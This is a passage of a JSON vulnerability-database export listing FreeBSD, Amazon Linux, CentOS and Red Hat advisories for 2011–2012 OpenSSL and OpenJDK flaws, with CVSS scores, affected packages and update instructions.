"7184F92E-8BB8-11E1-8D7B-003067B2972C", "href": "https://vuxml.freebsd.org/freebsd/7184f92e-8bb8-11e1-8d7b-003067b2972c.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-06T15:47:21", "description": "\n\nProblem description:\n\nOpenSSL fails to clear the bytes used as block cipher padding in SSL 3.0\n\t records when operating as a client or a server that accept SSL 3.0\n\t handshakes. As a result, in each record, up to 15 bytes of uninitialized\n\t memory may be sent, encrypted, to the SSL peer. This could include\n\t sensitive contents of previously freed memory. [CVE-2011-4576]\nOpenSSL support for handshake restarts for server gated cryptography (SGC)\n\t can be used in a denial-of-service attack. [CVE-2011-4619]\nIf an application uses OpenSSL's certificate policy checking when\n\t verifying X509 certificates, by enabling the X509_V_FLAG_POLICY_CHECK\n\t flag, a policy check failure can lead to a double-free. [CVE-2011-4109]\nA weakness in the OpenSSL PKCS #7 code can be exploited using\n\t Bleichenbacher's attack on PKCS #1 v1.5 RSA padding also known as the\n\t million message attack (MMA). [CVE-2012-0884]\nThe asn1_d2i_read_bio() function, used by the d2i_*_bio and d2i_*_fp\n\t functions, in OpenSSL contains multiple integer errors that can cause\n\t memory corruption when parsing encoded ASN.1 data. This error can occur\n\t on systems that parse untrusted ASN.1 data, such as X.509 certificates\n\t or RSA public keys. [CVE-2012-2110]\n\n\n", "cvss3": {}, "published": "2012-05-03T00:00:00", "type": "freebsd", "title": "FreeBSD -- OpenSSL multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4109", "CVE-2011-4576", "CVE-2011-4619", "CVE-2012-0884", "CVE-2012-2110"], "modified": "2012-05-03T00:00:00", "id": "2AE114DE-C064-11E1-B5E0-000C299B62E1", "href": "https://vuxml.freebsd.org/freebsd/2ae114de-c064-11e1-b5e0-000c299b62e1.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2023-12-06T18:15:32", "description": "**Issue Overview:**\n\nMultiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code. (CVE-2012-2110)\n\n \n**Affected Packages:** \n\n\nopenssl\n\n \n**Issue Correction:** \nRun _yum update openssl_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 openssl-static-1.0.0i-1.41.amzn1.i686 \n \u00a0\u00a0\u00a0 openssl-devel-1.0.0i-1.41.amzn1.i686 \n \u00a0\u00a0\u00a0 openssl-1.0.0i-1.41.amzn1.i686 \n \u00a0\u00a0\u00a0 openssl-perl-1.0.0i-1.41.amzn1.i686 \n \u00a0\u00a0\u00a0 openssl-debuginfo-1.0.0i-1.41.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 openssl-1.0.0i-1.41.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 openssl-devel-1.0.0i-1.41.amzn1.x86_64 \n \u00a0\u00a0\u00a0 openssl-perl-1.0.0i-1.41.amzn1.x86_64 \n \u00a0\u00a0\u00a0 openssl-static-1.0.0i-1.41.amzn1.x86_64 \n \u00a0\u00a0\u00a0 openssl-debuginfo-1.0.0i-1.41.amzn1.x86_64 \n \u00a0\u00a0\u00a0 openssl-1.0.0i-1.41.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2012-2110](<https://access.redhat.com/security/cve/CVE-2012-2110>)\n\nMitre: [CVE-2012-2110](<https://vulners.com/cve/CVE-2012-2110>)\n", "cvss3": {}, "published": "2012-05-02T12:28:00", "type": "amazon", "title": "Important: openssl", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2110"], "modified": "2014-09-14T15:52:00", "id": "ALAS-2012-072", "href": "https://alas.aws.amazon.com/ALAS-2012-72.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-06T18:15:31", "description": "**Issue Overview:**\n\nMultiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code. (CVE-2012-2110)\n\n \n**Affected Packages:** \n\n\nopenssl098e\n\n \n**Issue Correction:** \nRun _yum update openssl098e_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 openssl098e-0.9.8e-17.8.amzn1.i686 \n \u00a0\u00a0\u00a0 openssl098e-debuginfo-0.9.8e-17.8.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 openssl098e-0.9.8e-17.8.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 openssl098e-debuginfo-0.9.8e-17.8.amzn1.x86_64 \n \u00a0\u00a0\u00a0 openssl098e-0.9.8e-17.8.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2012-2110](<https://access.redhat.com/security/cve/CVE-2012-2110>)\n\nMitre: [CVE-2012-2110](<https://vulners.com/cve/CVE-2012-2110>)\n", "cvss3": {}, "published": "2012-05-02T12:31:00", "type": "amazon", "title": "Important: openssl098e", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2110"], "modified": "2014-09-14T15:52:00", "id": "ALAS-2012-073", "href": "https://alas.aws.amazon.com/ALAS-2012-73.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2023-12-06T19:15:12", "description": "**CentOS Errata and Security Advisory** CESA-2012:0518\n\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nMultiple numeric conversion errors, leading to a buffer overflow, were\nfound in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data\nfrom BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER\n(Distinguished Encoding Rules) encoded data read from a file or other BIO\ninput could cause an application using the OpenSSL library to crash or,\npotentially, execute arbitrary code. (CVE-2012-2110)\n\nAll OpenSSL users should upgrade to these updated packages, which contain\na backported patch to resolve this issue. For the update to take effect,\nall services linked to the OpenSSL library must be restarted, or the system\nrebooted.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2012-April/080754.html\nhttps://lists.centos.org/pipermail/centos-announce/2012-April/080758.html\n\n**Affected packages:**\nopenssl\nopenssl-devel\nopenssl-perl\nopenssl-static\nopenssl097a\nopenssl098e\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2012:0518", "cvss3": {}, "published": "2012-04-25T01:22:21", "type": "centos", "title": "openssl, openssl097a, openssl098e security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2110"], "modified": "2012-04-25T03:48:26", "id": "CESA-2012:0518", "href": "https://lists.centos.org/pipermail/centos-announce/2012-April/080754.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T21:02:40", "description": "**CentOS Errata and Security Advisory** CESA-2012:0135\n\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that Java2D did not properly check graphics rendering\nobjects before passing them to the native renderer. Malicious input, or an\nuntrusted Java application or applet could use this flaw to crash the Java\nVirtual Machine (JVM), or bypass Java sandbox restrictions. (CVE-2012-0497)\n\nIt was discovered that the exception thrown on deserialization failure did\nnot always contain a proper identification of the cause of the failure. An\nuntrusted Java application or applet could use this flaw to bypass Java\nsandbox restrictions. (CVE-2012-0505)\n\nThe AtomicReferenceArray class implementation did not properly check if\nthe array was of the expected Object[] type. A malicious Java application\nor applet could use this flaw to bypass Java sandbox restrictions.\n(CVE-2011-3571)\n\nIt was discovered that the use of TimeZone.setDefault() was not restricted\nby the SecurityManager, allowing an untrusted Java application or applet to\nset a new default time zone, and hence bypass Java sandbox restrictions.\n(CVE-2012-0503)\n\nThe HttpServer class did not limit the number of headers read from HTTP\nrequests. A remote attacker could use this flaw to make an application\nusing HttpServer use an excessive amount of CPU time via a\nspecially-crafted request. This update introduces a header count limit\ncontrolled using the sun.net.httpserver.maxReqHeaders property. The default\nvalue is 200. (CVE-2011-5035)\n\nThe Java Sound component did not properly check buffer boundaries.\nMalicious input, or an untrusted Java application or applet could use this\nflaw to cause the Java Virtual Machine (JVM) to crash or disclose a portion\nof its memory. (CVE-2011-3563)\n\nA flaw was found in the AWT KeyboardFocusManager that could allow an\nuntrusted Java application or applet to acquire keyboard focus and possibly\nsteal sensitive information. (CVE-2012-0502)\n\nIt was discovered that the CORBA (Common Object Request Broker\nArchitecture) implementation in Java did not properly protect repository\nidentifiers on certain CORBA objects. This could have been used to modify\nimmutable object data. (CVE-2012-0506)\n\nAn off-by-one flaw, causing a stack overflow, was found in the unpacker for\nZIP files. A specially-crafted ZIP archive could cause the Java Virtual\nMachine (JVM) to crash when opened. (CVE-2012-0501)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website.\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.10.6. Refer to\nthe NEWS file, linked to in the References, for further information.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2012-February/080599.html\n\n**Affected packages:**\njava-1.6.0-openjdk\njava-1.6.0-openjdk-demo\njava-1.6.0-openjdk-devel\njava-1.6.0-openjdk-javadoc\njava-1.6.0-openjdk-src\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2012:0135", "cvss3": {}, "published": "2012-02-15T10:26:37", "type": "centos", "title": "java security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3563", "CVE-2011-3571", "CVE-2011-5035", "CVE-2012-0497", "CVE-2012-0501", "CVE-2012-0502", "CVE-2012-0503", "CVE-2012-0505", "CVE-2012-0506", "CVE-2012-0507"], "modified": "2012-02-15T10:26:37", "id": "CESA-2012:0135", "href": "https://lists.centos.org/pipermail/centos-announce/2012-February/080599.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2021-10-19T18:41:39", "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nMultiple numeric conversion errors, leading to a buffer overflow, were\nfound in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data\nfrom BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER\n(Distinguished Encoding Rules) encoded data read from a file or other BIO\ninput could cause an application using the OpenSSL library to crash or,\npotentially, execute arbitrary code. (CVE-2012-2110)\n\nAll OpenSSL users should upgrade to these updated packages, which contain\na backported patch to resolve this issue. For the update to take effect,\nall services linked to the OpenSSL library must be restarted, or the system\nrebooted.\n", "cvss3": {}, "published": "2012-04-24T00:00:00", "type": "redhat", "title": "(RHSA-2012:0518) Important: openssl security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2110"], "modified": "2018-06-06T16:24:23", "id": "RHSA-2012:0518", "href": "https://access.redhat.com/errata/RHSA-2012:0518", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T04:43:24", "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nMultiple numeric conversion errors, leading to a buffer overflow, were\nfound in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data\nfrom BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER\n(Distinguished Encoding Rules) encoded data read from a file or other BIO\ninput could cause an application using the OpenSSL library to crash or,\npotentially, execute arbitrary code. (CVE-2012-2110)\n\nAll OpenSSL users should upgrade to these updated packages, which contain\na backported patch to resolve this issue. For the update to take effect,\nall services linked to the OpenSSL library must be restarted, or the system\nrebooted.\n", "cvss3": {}, "published": "2012-04-25T00:00:00", "type": "redhat", "title": "(RHSA-2012:0522) Important: openssl security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2110"], "modified": "2017-09-08T08:06:18", "id": "RHSA-2012:0522", "href": "https://access.redhat.com/errata/RHSA-2012:0522", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:37:31", "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nMultiple numeric conversion errors, leading to a buffer overflow, were\nfound in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data\nfrom BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER\n(Distinguished Encoding Rules) encoded data read from a file or other BIO\ninput could cause an application using the OpenSSL library to crash or,\npotentially, execute arbitrary code. (CVE-2012-2110)\n\nA double free flaw was discovered in the policy checking code in OpenSSL.\nA remote attacker could use this flaw to crash an application that uses\nOpenSSL by providing an X.509 certificate that has specially-crafted\npolicy extension data. (CVE-2011-4109)\n\nAn information leak flaw was found in the SSL 3.0 protocol implementation\nin OpenSSL. Incorrect initialization of SSL record padding bytes could\ncause an SSL client or server to send a limited amount of possibly\nsensitive data to its SSL peer via the encrypted connection.\n(CVE-2011-4576)\n\nIt was discovered that OpenSSL did not limit the number of TLS/SSL\nhandshake restarts required to support Server Gated Cryptography. A remote\nattacker could use this flaw to make a TLS/SSL server using OpenSSL consume\nan excessive amount of CPU by continuously restarting the handshake.\n(CVE-2011-4619)\n\nThis update also fixes additional security issues in OpenSSL that are not\nexposed in JBoss Enterprise Application Platform: CVE-2011-4108,\nCVE-2012-0884, CVE-2012-1165, and CVE-2012-2333.\n\nWarning: Before applying this update, back up your existing JBoss\nEnterprise Application Platform installation and deployed applications, and\nalso back up your existing Apache HTTP Server installation (including all\napplications and configuration files).\n\nAll users of JBoss Enterprise Application Platform 6.0.0 for Solaris and\nMicrosoft Windows as provided from the Red Hat Customer Portal are advised\nto apply this update.", "cvss3": {}, "published": "2012-09-24T15:54:31", "type": "redhat", "title": "(RHSA-2012:1308) Important: openssl security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4108", "CVE-2011-4109", "CVE-2011-4576", "CVE-2011-4619", "CVE-2012-0884", "CVE-2012-1165", "CVE-2012-2110", "CVE-2012-2333"], "modified": "2019-02-20T12:34:19", "id": "RHSA-2012:1308", "href": "https://access.redhat.com/errata/RHSA-2012:1308", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T20:39:31", "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nMultiple numeric conversion errors, leading to a buffer overflow, were\nfound in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data\nfrom BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER\n(Distinguished Encoding Rules) encoded data read from a file or other BIO\ninput could cause an application using the OpenSSL library to crash or,\npotentially, execute arbitrary code. (CVE-2012-2110)\n\nA double free flaw was discovered in the policy checking code in OpenSSL.\nA remote attacker could use this flaw to crash an application that uses\nOpenSSL by providing an X.509 certificate that has specially-crafted\npolicy extension data. (CVE-2011-4109)\n\nAn information leak flaw was found in the SSL 3.0 protocol implementation\nin OpenSSL. Incorrect initialization of SSL record padding bytes could\ncause an SSL client or server to send a limited amount of possibly\nsensitive data to its SSL peer via the encrypted connection.\n(CVE-2011-4576)\n\nIt was discovered that OpenSSL did not limit the number of TLS/SSL\nhandshake restarts required to support Server Gated Cryptography. A remote\nattacker could use this flaw to make a TLS/SSL server using OpenSSL consume\nan excessive amount of CPU by continuously restarting the handshake.\n(CVE-2011-4619)\n\nThis update also fixes additional security issues in OpenSSL that are not\nexposed in JBoss Enterprise Application Platform: CVE-2011-4108,\nCVE-2012-0884, CVE-2012-1165, and CVE-2012-2333.\n\nWarning: Before applying this update, back up your JBoss Enterprise\nApplication Platform's \"server/[PROFILE]/deploy/\" directory, along with all\nother customized configuration files.\n\nAll users of JBoss Enterprise Application Platform 5.1.2 for Solaris and\nMicrosoft Windows as provided from the Red Hat Customer Portal are advised\nto apply this update.", "cvss3": {}, "published": "2012-09-24T15:53:22", "type": "redhat", "title": "(RHSA-2012:1307) Important: openssl security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4108", "CVE-2011-4109", "CVE-2011-4576", "CVE-2011-4619", "CVE-2012-0884", "CVE-2012-1165", "CVE-2012-2110", "CVE-2012-2333"], "modified": "2019-02-20T12:34:35", "id": "RHSA-2012:1307", "href": "https://access.redhat.com/errata/RHSA-2012:1307", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T20:37:23", "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nMultiple numeric conversion errors, leading to a buffer overflow, were\nfound in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data\nfrom BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER\n(Distinguished Encoding Rules) encoded data read from a file or other BIO\ninput could cause an application using the OpenSSL library to crash or,\npotentially, execute arbitrary code. (CVE-2012-2110)\n\nA double free flaw was discovered in the policy checking code in OpenSSL.\nA remote attacker could use this flaw to crash an application that uses\nOpenSSL by providing an X.509 certificate that has specially-crafted\npolicy extension data. (CVE-2011-4109)\n\nAn information leak flaw was found in the SSL 3.0 protocol implementation\nin OpenSSL. Incorrect initialization of SSL record padding bytes could\ncause an SSL client or server to send a limited amount of possibly\nsensitive data to its SSL peer via the encrypted connection.\n(CVE-2011-4576)\n\nIt was discovered that OpenSSL did not limit the number of TLS/SSL\nhandshake restarts required to support Server Gated Cryptography. A remote\nattacker could use this flaw to make a TLS/SSL server using OpenSSL consume\nan excessive amount of CPU by continuously restarting the handshake.\n(CVE-2011-4619)\n\nThis update also fixes additional security issues in OpenSSL that are not\nexposed in JBoss Enterprise Web Server: CVE-2011-4108, CVE-2012-0884,\nCVE-2012-1165, and CVE-2012-2333.\n\nWarning: Before applying the update, back up your existing JBoss Enterprise\nWeb Server installation (including all applications and configuration\nfiles).\n\nAll users of JBoss Enterprise Web Server 1.0.2 for Solaris and Microsoft\nWindows as provided from the Red Hat Customer Portal are advised to apply\nthis update.", "cvss3": {}, "published": "2012-09-24T15:52:11", "type": "redhat", "title": "(RHSA-2012:1306) Important: openssl security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4108", "CVE-2011-4109", "CVE-2011-4576", "CVE-2011-4619", "CVE-2012-0884", "CVE-2012-1165", "CVE-2012-2110", "CVE-2012-2333"], "modified": "2019-02-20T12:37:00", "id": "RHSA-2012:1306", "href": "https://access.redhat.com/errata/RHSA-2012:1306", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T18:41:13", "description": "These packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that Java2D did not properly check graphics rendering\nobjects before passing them to the native renderer. Malicious input, or an\nuntrusted Java application or applet could use this flaw to crash the Java\nVirtual Machine (JVM), or bypass Java sandbox restrictions. (CVE-2012-0497)\n\nIt was discovered that the exception thrown on deserialization failure did\nnot always contain a proper identification of the cause of the failure. An\nuntrusted Java application or applet could use this flaw to bypass Java\nsandbox restrictions. (CVE-2012-0505)\n\nThe AtomicReferenceArray class implementation did not properly check if\nthe array was of the expected Object[] type. A malicious Java application\nor applet could use this flaw to bypass Java sandbox restrictions.\n(CVE-2011-3571)\n\nIt was discovered that the use of TimeZone.setDefault() was not restricted\nby the SecurityManager, allowing an untrusted Java application or applet to\nset a new default time zone, and hence bypass Java sandbox restrictions.\n(CVE-2012-0503)\n\nThe HttpServer class did not limit the number of headers read from HTTP\nrequests. A remote attacker could use this flaw to make an application\nusing HttpServer use an excessive amount of CPU time via a\nspecially-crafted request. This update introduces a header count limit\ncontrolled using the sun.net.httpserver.maxReqHeaders property. The default\nvalue is 200. (CVE-2011-503